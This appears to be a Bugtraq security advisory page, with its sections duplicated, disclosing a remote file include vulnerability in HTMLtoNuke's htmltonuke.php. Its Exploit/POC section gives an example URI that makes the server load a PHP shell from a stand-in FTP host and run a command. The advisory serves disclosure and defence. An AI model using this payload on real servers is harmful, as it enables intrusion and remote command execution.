HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability
BID:16282
Info
HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability
| Bugtraq ID: | 16282 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2006 12:00AM |
| Updated: | Jan 17 2006 12:00AM |
| Credit: | ArCaX-ATH is credited with the discovery of this vulnerability. |
| Vulnerable: |
htmltonuke htmltonuke |
| Not Vulnerable: | |
Discussion
HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability
HTMLtoNuke is prone to a remote file include vulnerability. This is due to a lack of proper sanitization of user-supplied input.
An attacker can exploit this issue to execute arbitrary remote HTML and script code on an affected computer with the privileges of the Web server process.
Successful exploitation could facilitate unauthorized access; other attacks are also possible.
HTMLtoNuke is prone to a remote file include vulnerability. This is due to a lack of proper sanitization of user-supplied input.
An attacker can exploit this issue to execute arbitrary remote HTML and script code on an affected computer with the privileges of the Web server process.
Successful exploitation could facilitate unauthorized access; other attacks are also possible.
Exploit / POC
HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability
An exploit is not required.
An example URI has been provided:
http://www.example.com/htmltonuke.php?filnavn=ftp://user:pass@ftpserver/phpshell.html&cmd=id
An exploit is not required.
An example URI has been provided:
http://www.example.com/htmltonuke.php?filnavn=ftp://user:pass@ftpserver/phpshell.html&cmd=id
Solution / Fix
HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability
References:
References:
- htmltonuke Web Site (htmltonuke)